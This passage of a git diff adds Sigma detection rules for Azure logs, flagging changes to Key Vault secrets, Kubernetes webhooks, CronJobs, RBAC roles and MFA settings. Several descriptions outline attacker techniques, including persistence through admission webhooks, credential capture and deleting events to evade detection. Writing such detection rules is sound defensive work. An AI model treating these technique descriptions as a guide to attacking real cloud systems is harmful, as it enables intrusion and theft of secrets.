+date: 2021/08/08 +references: + - https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes +logsource: + product: azure + service: activitylogs +detection: + selection: + properties.message|startswith: MICROSOFT.NETWORK/DNSZONES + properties.message|endswith: + - /WRITE + - /DELETE + condition: selection +level: medium +tags: + - attack.impact +falsepositives: + - DNS zone modified and deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. + - DNS zone modification from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. diff --git a/bin/main/rules/others_cloud/azure/azure_federation_modified.yml b/bin/main/rules/others_cloud/azure/azure_federation_modified.yml new file mode 100644 index 000000000..4512ee967 --- /dev/null +++ b/bin/main/rules/others_cloud/azure/azure_federation_modified.yml @@ -0,0 +1,25 @@ +title: Azure Domain Federation Settings Modified +id: 352a54e1-74ba-4929-9d47-8193d67aba1e +description: Identifies when an user or application modified the federation settings on the domain. +author: Austin Songer +status: experimental +date: 2021/09/06 +modified: 2022/06/08 +references: + - https://attack.mitre.org/techniques/T1078 + - https://docs.microsoft.com/en-us/azure/active-directory/hybrid/how-to-connect-monitor-federation-changes +logsource: + product: azure + service: auditlogs +detection: + selection: + ActivityDisplayName: Set federation settings on domain + condition: selection +level: medium +tags: + - attack.initial_access + - attack.t1078 +falsepositives: + - Federation Settings being modified or deleted may be performed by a system administrator. + - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. + - Federation Settings modified from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. diff --git a/bin/main/rules/others_cloud/azure/azure_firewall_modified_or_deleted.yml b/bin/main/rules/others_cloud/azure/azure_firewall_modified_or_deleted.yml new file mode 100644 index 000000000..28c659a05 --- /dev/null +++ b/bin/main/rules/others_cloud/azure/azure_firewall_modified_or_deleted.yml @@ -0,0 +1,23 @@ +title: Azure Firewall Modified or Deleted +id: 512cf937-ea9b-4332-939c-4c2c94baadcd +description: Identifies when a firewall is created, modified, or deleted. +author: Austin Songer @austinsonger +status: experimental +date: 2021/08/08 +references: + - https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations +logsource: + product: azure + service: activitylogs +detection: + selection: + properties.message: + - MICROSOFT.NETWORK/AZUREFIREWALLS/WRITE + - MICROSOFT.NETWORK/AZUREFIREWALLS/DELETE + condition: selection +level: medium +tags: + - attack.impact +falsepositives: + - Firewall being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. + - Firewall modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. diff --git a/bin/main/rules/others_cloud/azure/azure_firewall_rule_collection_modified_or_deleted.yml b/bin/main/rules/others_cloud/azure/azure_firewall_rule_collection_modified_or_deleted.yml new file mode 100644 index 000000000..de1fc0c5d --- /dev/null +++ b/bin/main/rules/others_cloud/azure/azure_firewall_rule_collection_modified_or_deleted.yml @@ -0,0 +1,27 @@ +title: Azure Firewall Rule Collection Modified or Deleted +id: 025c9fe7-db72-49f9-af0d-31341dd7dd57 +description: Identifies when Rule Collections (Application, NAT, and Network) is being modified or deleted. +author: Austin Songer @austinsonger +status: experimental +date: 2021/08/08 +references: + - https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations +logsource: + product: azure + service: activitylogs +detection: + selection: + properties.message: + - MICROSOFT.NETWORK/AZUREFIREWALLS/APPLICATIONRULECOLLECTIONS/WRITE + - MICROSOFT.NETWORK/AZUREFIREWALLS/APPLICATIONRULECOLLECTIONS/DELETE + - MICROSOFT.NETWORK/AZUREFIREWALLS/NATRULECOLLECTIONS/WRITE + - MICROSOFT.NETWORK/AZUREFIREWALLS/NATRULECOLLECTIONS/DELETE + - MICROSOFT.NETWORK/AZUREFIREWALLS/NETWORKRULECOLLECTIONS/WRITE + - MICROSOFT.NETWORK/AZUREFIREWALLS/NETWORKRULECOLLECTIONS/DELETE + condition: selection +level: medium +tags: + - attack.impact +falsepositives: + - Rule Collections (Application, NAT, and Network) being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. + - Rule Collections (Application, NAT, and Network) modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. diff --git a/bin/main/rules/others_cloud/azure/azure_granting_permission_detection.yml b/bin/main/rules/others_cloud/azure/azure_granting_permission_detection.yml new file mode 100644 index 000000000..d1fb9dfd4 --- /dev/null +++ b/bin/main/rules/others_cloud/azure/azure_granting_permission_detection.yml @@ -0,0 +1,21 @@ +title: Granting Of Permissions To An Account +id: a622fcd2-4b5a-436a-b8a2-a4171161833c +status: test +description: Identifies IPs from which users grant access to other users on azure resources and alerts when a previously unseen source IP address is used. +author: sawwinnnaung +references: + - https://github.com/Azure/Azure-Sentinel/blob/master/Detections/azureactivity/Granting_Permissions_To_Account_detection.yaml +date: 2020/05/07 +modified: 2021/11/27 +logsource: + product: azure + service: azureactivity +detection: + keywords: + - Microsoft.Authorization/roleAssignments/write + condition: keywords +falsepositives: + - Valid change +level: medium +tags: + - attack.t1098 diff --git a/bin/main/rules/others_cloud/azure/azure_keyvault_key_modified_or_deleted.yml b/bin/main/rules/others_cloud/azure/azure_keyvault_key_modified_or_deleted.yml new file mode 100644 index 000000000..ab657e79c --- /dev/null +++ b/bin/main/rules/others_cloud/azure/azure_keyvault_key_modified_or_deleted.yml @@ -0,0 +1,34 @@ +title: Azure Keyvault Key Modified or Deleted +id: 80eeab92-0979-4152-942d-96749e11df40 +description: Identifies when a Keyvault Key is modified or deleted in Azure. +author: Austin Songer @austinsonger +status: experimental +date: 2021/08/16 +references: + - https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations +logsource: + product: azure + service: activitylogs +detection: + selection: + properties.message: + - MICROSOFT.KEYVAULT/VAULTS/KEYS/UPDATE/ACTION + - MICROSOFT.KEYVAULT/VAULTS/KEYS/CREATE + - MICROSOFT.KEYVAULT/VAULTS/KEYS/CREATE/ACTION + - MICROSOFT.KEYVAULT/VAULTS/KEYS/IMPORT/ACTION + - MICROSOFT.KEYVAULT/VAULTS/KEYS/RECOVER/ACTION + - MICROSOFT.KEYVAULT/VAULTS/KEYS/RESTORE/ACTION + - MICROSOFT.KEYVAULT/VAULTS/KEYS/DELETE + - MICROSOFT.KEYVAULT/VAULTS/KEYS/BACKUP/ACTION + - MICROSOFT.KEYVAULT/VAULTS/KEYS/PURGE/ACTION + condition: selection +level: medium +tags: + - attack.impact + - attack.credential_access + - attack.t1552 + - attack.t1552.001 +falsepositives: + - Key being modified or deleted may be performed by a system administrator. + - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. + - Key modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. diff --git a/bin/main/rules/others_cloud/azure/azure_keyvault_modified_or_deleted.yml b/bin/main/rules/others_cloud/azure/azure_keyvault_modified_or_deleted.yml new file mode 100644 index 000000000..d63cfe24d --- /dev/null +++ b/bin/main/rules/others_cloud/azure/azure_keyvault_modified_or_deleted.yml @@ -0,0 +1,29 @@ +title: Azure Key Vault Modified or Deleted +id: 459a2970-bb84-4e6a-a32e-ff0fbd99448d +description: Identifies when a key vault is modified or deleted. +author: Austin Songer @austinsonger +status: experimental +date: 2021/08/16 +references: + - https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations +logsource: + product: azure + service: activitylogs +detection: + selection: + properties.message: + - MICROSOFT.KEYVAULT/VAULTS/WRITE + - MICROSOFT.KEYVAULT/VAULTS/DELETE + - MICROSOFT.KEYVAULT/VAULTS/DEPLOY/ACTION + - MICROSOFT.KEYVAULT/VAULTS/ACCESSPOLICIES/WRITE + condition: selection +level: medium +tags: + - attack.impact + - attack.credential_access + - attack.t1552 + - attack.t1552.001 +falsepositives: + - Key Vault being modified or deleted may be performed by a system administrator. + - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. + - Key Vault modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. diff --git a/bin/main/rules/others_cloud/azure/azure_keyvault_secrets_modified_or_deleted.yml b/bin/main/rules/others_cloud/azure/azure_keyvault_secrets_modified_or_deleted.yml new file mode 100644 index 000000000..b31895d4a --- /dev/null +++ b/bin/main/rules/others_cloud/azure/azure_keyvault_secrets_modified_or_deleted.yml @@ -0,0 +1,33 @@ +title: Azure Keyvault Secrets Modified or Deleted +id: b831353c-1971-477b-abb6-2828edc3bca1 +description: Identifies when secrets are modified or deleted in Azure. +author: Austin Songer @austinsonger +status: experimental +date: 2021/08/16 +references: + - https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations +logsource: + product: azure + service: activitylogs +detection: + selection: + properties.message: + - MICROSOFT.KEYVAULT/VAULTS/SECRETS/WRITE + - MICROSOFT.KEYVAULT/VAULTS/SECRETS/DELETE + - MICROSOFT.KEYVAULT/VAULTS/SECRETS/BACKUP/ACTION + - MICROSOFT.KEYVAULT/VAULTS/SECRETS/PURGE/ACTION + - MICROSOFT.KEYVAULT/VAULTS/SECRETS/UPDATE/ACTION + - MICROSOFT.KEYVAULT/VAULTS/SECRETS/RECOVER/ACTION + - MICROSOFT.KEYVAULT/VAULTS/SECRETS/RESTORE/ACTION + - MICROSOFT.KEYVAULT/VAULTS/SECRETS/SETSECRET/ACTION + condition: selection +level: medium +tags: + - attack.impact + - attack.credential_access + - attack.t1552 + - attack.t1552.001 +falsepositives: + - Secrets being modified or deleted may be performed by a system administrator. + - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. + - Secrets modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. diff --git a/bin/main/rules/others_cloud/azure/azure_kubernetes_admission_controller.yml b/bin/main/rules/others_cloud/azure/azure_kubernetes_admission_controller.yml new file mode 100644 index 000000000..d8f36f7b2 --- /dev/null +++ b/bin/main/rules/others_cloud/azure/azure_kubernetes_admission_controller.yml @@ -0,0 +1,34 @@ +title: Azure Kubernetes Admission Controller +id: a61a3c56-4ce2-4351-a079-88ae4cbd2b58 +description: Identifies when an admission controller is executed in Azure Kubernetes. A Kubernetes Admission controller intercepts, and possibly modifies, requests to the Kubernetes API server. The behavior of this admission controller is determined by an admission webhook (MutatingAdmissionWebhook or ValidatingAdmissionWebhook) that the user deploys in the cluster. An adversary can use such webhooks as the MutatingAdmissionWebhook for obtaining persistence in the cluster. For example, attackers can intercept and modify the pod creation operations in the cluster and add their malicious container to every created pod. An adversary can use the webhook ValidatingAdmissionWebhook, which could be used to obtain access credentials. An adversary could use the webhook to intercept the requests to the API server, record secrets, and other sensitive information. +author: Austin Songer @austinsonger +status: experimental +date: 2021/11/25 +modified: 2021/11/26 +references: + - https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes +logsource: + product: azure + service: activitylogs +detection: + selection1: + properties.message|startswith: MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/ADMISSIONREGISTRATION.K8S.IO + properties.message|endswith: + - /MUTATINGWEBHOOKCONFIGURATIONS/WRITE + - /VALIDATINGWEBHOOKCONFIGURATIONS/WRITE + selection2: + properties.message|startswith: MICROSOFT.CONTAINERSERVICE/MANAGEDCLUSTERS/ADMISSIONREGISTRATION.K8S.IO + properties.message|endswith: + - /MUTATINGWEBHOOKCONFIGURATIONS/WRITE + - /VALIDATINGWEBHOOKCONFIGURATIONS/WRITE + condition: selection1 or selection2 +level: medium +tags: + - attack.persistence + - attack.t1078 + - attack.credential_access + - attack.t1552 + - attack.t1552.007 +falsepositives: +- Azure Kubernetes Admissions Controller may be done by a system administrator. +- If known behavior is causing false positives, it can be exempted from the rule. diff --git a/bin/main/rules/others_cloud/azure/azure_kubernetes_cluster_created_or_deleted.yml b/bin/main/rules/others_cloud/azure/azure_kubernetes_cluster_created_or_deleted.yml new file mode 100644 index 000000000..d9be4f586 --- /dev/null +++ b/bin/main/rules/others_cloud/azure/azure_kubernetes_cluster_created_or_deleted.yml @@ -0,0 +1,27 @@ +title: Azure Kubernetes Cluster Created or Deleted +id: 9541f321-7cba-4b43-80fc-fbd1fb922808 +description: Detects when a Azure Kubernetes Cluster is created or deleted. +author: Austin Songer @austinsonger +status: experimental +date: 2021/08/07 +references: + - https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes + - https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/ + - https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/ + - https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1 + - https://attack.mitre.org/matrices/enterprise/cloud/ +logsource: + product: azure + service: activitylogs +detection: + selection: + properties.message: + - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/WRITE + - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/DELETE + condition: selection +level: low +tags: + - attack.impact +falsepositives: + - Kubernetes cluster being created or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. + - Kubernetes cluster created or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. diff --git a/bin/main/rules/others_cloud/azure/azure_kubernetes_cronjob.yml b/bin/main/rules/others_cloud/azure/azure_kubernetes_cronjob.yml new file mode 100644 index 000000000..146f196aa --- /dev/null +++ b/bin/main/rules/others_cloud/azure/azure_kubernetes_cronjob.yml @@ -0,0 +1,34 @@ +title: Azure Kubernetes CronJob +id: 1c71e254-6655-42c1-b2d6-5e4718d7fc0a +description: Identifies when a Azure Kubernetes CronJob runs in Azure Cloud. Kubernetes Job is a controller that creates one or more pods and ensures that a specified number of them successfully terminate. Kubernetes Job can be used to run containers that perform finite tasks for batch jobs. Kubernetes CronJob is used to schedule Jobs. An Adversary may use Kubernetes CronJob for scheduling execution of malicious code that would run as a container in the cluster. +author: Austin Songer @austinsonger +status: experimental +date: 2021/11/22 +references: + - https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes + - https://kubernetes.io/docs/concepts/workloads/controllers/cron-jobs/ + - https://kubernetes.io/docs/concepts/workloads/controllers/job/ + - https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/ +logsource: + product: azure + service: activitylogs +detection: + selection1: + properties.message|startswith: MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/BATCH + properties.message|endswith: + - /CRONJOBS/WRITE + - /JOBS/WRITE + selection2: + properties.message|startswith: MICROSOFT.CONTAINERSERVICE/MANAGEDCLUSTERS/BATCH + properties.message|endswith: + - /CRONJOBS/WRITE + - /JOBS/WRITE + condition: selection1 or selection2 +level: medium +tags: + - attack.persistence + - attack.privilege_escalation + - attack.execution +falsepositives: + - Azure Kubernetes CronJob/Job may be done by a system administrator. + - If known behavior is causing false positives, it can be exempted from the rule. diff --git a/bin/main/rules/others_cloud/azure/azure_kubernetes_events_deleted.yml b/bin/main/rules/others_cloud/azure/azure_kubernetes_events_deleted.yml new file mode 100644 index 000000000..9252c26fb --- /dev/null +++ b/bin/main/rules/others_cloud/azure/azure_kubernetes_events_deleted.yml @@ -0,0 +1,23 @@ +title: Azure Kubernetes Events Deleted +id: 225d8b09-e714-479c-a0e4-55e6f29adf35 +description: Detects when Events are deleted in Azure Kubernetes. An adversary may delete events in Azure Kubernetes in an attempt to evade detection. +author: Austin Songer @austinsonger +status: experimental +date: 2021/07/24 +references: + - https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes + - https://github.com/elastic/detection-rules/blob/da3852b681cf1a33898b1535892eab1f3a76177a/rules/integrations/azure/defense_evasion_kubernetes_events_deleted.toml +logsource: + product: azure + service: activitylogs +detection: + selection_operation_name: + properties.message: MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/EVENTS.K8S.IO/EVENTS/DELETE + condition: selection_operation_name +level: medium +tags: + - attack.defense_evasion + - attack.t1562 + - attack.t1562.001 +falsepositives: +- Event deletions may be done by a system or network administrator. Verify whether the username, hostname, and/or resource name should be making changes in your environment. Events deletions from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule. diff --git a/bin/main/rules/others_cloud/azure/azure_kubernetes_network_policy_change.yml b/bin/main/rules/others_cloud/azure/azure_kubernetes_network_policy_change.yml new file mode 100644 index 000000000..71b65a4f2 --- /dev/null +++ b/bin/main/rules/others_cloud/azure/azure_kubernetes_network_policy_change.yml @@ -0,0 +1,30 @@ +title: Azure Kubernetes Network Policy Change +id: 08d6ac24-c927-4469-b3b7-2e422d6e3c43 +description: Identifies when a Azure Kubernetes network policy is modified or deleted. +author: Austin Songer @austinsonger +status: experimental +date: 2021/08/07 +references: + - https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes + - https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/ + - https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/ + - https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1 + - https://attack.mitre.org/matrices/enterprise/cloud/ +logsource: + product: azure + service: activitylogs +detection: + selection: + properties.message: + - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/NETWORKING.K8S.IO/NETWORKPOLICIES/WRITE + - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/NETWORKING.K8S.IO/NETWORKPOLICIES/DELETE + - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/EXTENSIONS/NETWORKPOLICIES/WRITE + - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/EXTENSIONS/NETWORKPOLICIES/DELETE + condition: selection +level: medium +tags: + - attack.impact + - attack.credential_access +falsepositives: + - Network Policy being modified and deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. + - Network Policy being modified and deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. diff --git a/bin/main/rules/others_cloud/azure/azure_kubernetes_pods_deleted.yml b/bin/main/rules/others_cloud/azure/azure_kubernetes_pods_deleted.yml new file mode 100644 index 000000000..ac7d0e1df --- /dev/null +++ b/bin/main/rules/others_cloud/azure/azure_kubernetes_pods_deleted.yml @@ -0,0 +1,22 @@ +title: Azure Kubernetes Pods Deleted +id: b02f9591-12c3-4965-986a-88028629b2e1 +description: Identifies the deletion of Azure Kubernetes Pods. +author: Austin Songer @austinsonger +status: experimental +date: 2021/07/24 +references: + - https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes + - https://github.com/elastic/detection-rules/blob/065bf48a9987cd8bd826c098a30ce36e6868ee46/rules/integrations/azure/impact_kubernetes_pod_deleted.toml +logsource: + product: azure + service: activitylogs +detection: + selection_operation_name: + properties.message: MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/PODS/DELETE + condition: selection_operation_name +level: medium +tags: + - attack.impact +falsepositives: +- Pods may be deleted by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. +- Pods deletions from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule. diff --git a/bin/main/rules/others_cloud/azure/azure_kubernetes_role_access.yml b/bin/main/rules/others_cloud/azure/azure_kubernetes_role_access.yml new file mode 100644 index 000000000..a3c9bf010 --- /dev/null +++ b/bin/main/rules/others_cloud/azure/azure_kubernetes_role_access.yml @@ -0,0 +1,33 @@ +title: Azure Kubernetes Sensitive Role Access +id: 818fee0c-e0ec-4e45-824e-83e4817b0887 +description: Identifies when ClusterRoles/Roles are being modified or deleted. +author: Austin Songer @austinsonger +status: experimental +date: 2021/08/07 +references: + - https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes + - https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/ + - https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/ + - https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1 + - https://attack.mitre.org/matrices/enterprise/cloud/ +logsource: + product: azure + service: activitylogs +detection: + selection: + properties.message: + - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/RBAC.AUTHORIZATION.K8S.IO/ROLES/WRITE + - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/RBAC.AUTHORIZATION.K8S.IO/ROLES/DELETE + - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/RBAC.AUTHORIZATION.K8S.IO/ROLES/BIND/ACTION + - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/RBAC.AUTHORIZATION.K8S.IO/ROLES/ESCALATE/ACTION + - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/RBAC.AUTHORIZATION.K8S.IO/CLUSTERROLES/WRITE + - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/RBAC.AUTHORIZATION.K8S.IO/CLUSTERROLES/DELETE + - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/RBAC.AUTHORIZATION.K8S.IO/CLUSTERROLES/BIND/ACTION + - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/RBAC.AUTHORIZATION.K8S.IO/CLUSTERROLES/ESCALATE/ACTION + condition: selection +level: medium +tags: + - attack.impact +falsepositives: + - ClusterRoles/Roles being modified and deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. + - ClusterRoles/Roles modification from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. diff --git a/bin/main/rules/others_cloud/azure/azure_kubernetes_rolebinding_modified_or_deleted.yml b/bin/main/rules/others_cloud/azure/azure_kubernetes_rolebinding_modified_or_deleted.yml new file mode 100644 index 000000000..efea094a1 --- /dev/null +++ b/bin/main/rules/others_cloud/azure/azure_kubernetes_rolebinding_modified_or_deleted.yml @@ -0,0 +1,30 @@ +title: Azure Kubernetes RoleBinding/ClusterRoleBinding Modified and Deleted +id: 25cb259b-bbdc-4b87-98b7-90d7c72f8743 +description: Detects the creation or patching of potential malicious RoleBinding/ClusterRoleBinding. +author: Austin Songer @austinsonger +status: experimental +date: 2021/08/07 +references: + - https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes + - https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/ + - https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/ + - https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1 + - https://attack.mitre.org/matrices/enterprise/cloud/ +logsource: + product: azure + service: activitylogs +detection: + selection: + properties.message: + - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/RBAC.AUTHORIZATION.K8S.IO/CLUSTERROLEBINDINGS/WRITE + - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/RBAC.AUTHORIZATION.K8S.IO/CLUSTERROLEBINDINGS/DELETE + - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/RBAC.AUTHORIZATION.K8S.IO/ROLEBINDINGS/WRITE + - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/RBAC.AUTHORIZATION.K8S.IO/ROLEBINDINGS/DELETE + condition: selection +level: medium +tags: + - attack.impact + - attack.credential_access +falsepositives: + - RoleBinding/ClusterRoleBinding being modified and deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. + - RoleBinding/ClusterRoleBinding modification from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. diff --git a/bin/main/rules/others_cloud/azure/azure_kubernetes_secret_or_config_object_access.yml b/bin/main/rules/others_cloud/azure/azure_kubernetes_secret_or_config_object_access.yml new file mode 100644 index 000000000..f809df396 --- /dev/null +++ b/bin/main/rules/others_cloud/azure/azure_kubernetes_secret_or_config_object_access.yml @@ -0,0 +1,28 @@ +title: Azure Kubernetes Secret or Config Object Access +id: 7ee0b4aa-d8d4-4088-b661-20efdf41a04c +description: Identifies when a Kubernetes account access a sensitive objects such as configmaps or secrets. +author: Austin Songer @austinsonger +status: experimental +date: 2021/08/07 +references: + - https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes + - https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/ + - https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/ + - https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1 + - https://attack.mitre.org/matrices/enterprise/cloud/ +logsource: + product: azure + service: activitylogs +detection: + selection: + properties.message: + - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/CONFIGMAPS/WRITE + - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/CONFIGMAPS/DELETE + - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/SECRETS/WRITE + - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/SECRETS/DELETE + condition: selection +level: medium +tags: + - attack.impact +falsepositives: + - Sensitive objects may be accessed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. Sensitive objects accessed from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. diff --git a/bin/main/rules/others_cloud/azure/azure_kubernetes_service_account_modified_or_deleted.yml b/bin/main/rules/others_cloud/azure/azure_kubernetes_service_account_modified_or_deleted.yml new file mode 100644 index 000000000..355e7bd31 --- /dev/null +++ b/bin/main/rules/others_cloud/azure/azure_kubernetes_service_account_modified_or_deleted.yml @@ -0,0 +1,28 @@ +title: Azure Kubernetes Service Account Modified or Deleted +id: 12d027c3-b48c-4d9d-8bb6-a732200034b2 +description: Identifies when a service account is modified or deleted. +author: Austin Songer @austinsonger +status: experimental +date: 2021/08/07 +references: + - https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes + - https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/ + - https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/ + - https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1 + - https://attack.mitre.org/matrices/enterprise/cloud/ +logsource: + product: azure + service: activitylogs +detection: + selection: + properties.message: + - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/SERVICEACCOUNTS/WRITE + - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/SERVICEACCOUNTS/DELETE + - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/SERVICEACCOUNTS/IMPERSONATE/ACTION + condition: selection +level: medium +tags: + - attack.impact +falsepositives: + - Service account being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. + - Service account modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. diff --git a/bin/main/rules/others_cloud/azure/azure_login_to_disabled_account.yml b/bin/main/rules/others_cloud/azure/azure_login_to_disabled_account.yml new file mode 100644 index 000000000..41c45d939 --- /dev/null +++ b/bin/main/rules/others_cloud/azure/azure_login_to_disabled_account.yml @@ -0,0 +1,22 @@ +title: Login to Disabled Account +id: 908655e0-25cf-4ae1-b775-1c8ce9cf43d8 +status: experimental +author: AlertIQ +date: 2021/10/10 +description: Detect failed attempts to sign in to disabled accounts. +references: + - https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts +logsource: + product: azure + service: signinlogs +detection: + selection: + ResultType: 50057 + ResultDescription: 'User account is disabled. The account has been disabled by an administrator.' + condition: selection +level: medium +falsepositives: + - Unknown +tags: + - attack.initial_access + - attack.t1078 diff --git a/bin/main/rules/others_cloud/azure/azure_mfa_denies.yml b/bin/main/rules/others_cloud/azure/azure_mfa_denies.yml new file mode 100644 index 000000000..f0f63b75e --- /dev/null +++ b/bin/main/rules/others_cloud/azure/azure_mfa_denies.yml @@ -0,0 +1,22 @@ +title: Multifactor Authentication Denied +id: e40f4962-b02b-4192-9bfe-245f7ece1f99 +status: experimental +author: AlertIQ +date: 2022/03/24 +description: User has indicated they haven't instigated the MFA prompt and could indicate an attacker has the password for the account. +references: + - https://www.microsoft.com/security/blog/2022/03/22/dev-0537-criminal-actor-targeting-organizations-for-data-exfiltration-and-destruction/ +logsource: + product: azure + service: signinlogs +detection: + selection: + AuthenticationRequirement: 'multiFactorAuthentication' + Status|contains: 'MFA Denied' + condition: selection +level: medium +falsepositives: + - Users actually login but miss-click into the Deny button when MFA prompt. +tags: + - attack.initial_access + - attack.t1078.004 diff --git a/bin/main/rules/others_cloud/azure/azure_mfa_disabled.yml b/bin/main/rules/others_cloud/azure/azure_mfa_disabled.yml new file mode 100644 index 000000000..d8ce54bce --- /dev/null +++ b/bin/main/rules/others_cloud/azure/azure_mfa_disabled.yml @@ -0,0 +1,24 @@ +title: Disabled MFA to Bypass Authentication Mechanisms +id: 7ea78478-a4f9-42a6-9dcd-f861816122bf +status: experimental +description: Detection for when multi factor authentication has been disabled, which might indicate a malicious activity to bypass authentication mechanisms. +author: '@ionsor' +date: 2022/02/08 +references: + - https://attack.mitre.org/techniques/T1556/ + - https://docs.microsoft.com/en-us/azure/active-directory/authentication/howto-mfa-userstates +logsource: + product: azure + service: activitylogs +detection: + selection: + eventSource: AzureActiveDirectory + eventName: 'Disable Strong Authentication.' + status: success + condition: selection +falsepositives: + - Authorized modification by administrators +level: medium +tags: + - attack.persistence + - attack.t1556 diff --git a/bin/main/rules/others_cloud/azure/azure_mfa_interrupted.yml b/bin/main/rules/others_cloud/azure/azure_mfa_interrupted.yml new file mode 100644 index 000000000..5919ea0fe --- /dev/null +++ b/bin/main/rules/others_cloud/azure/azure_mfa_interrupted.yml @@ 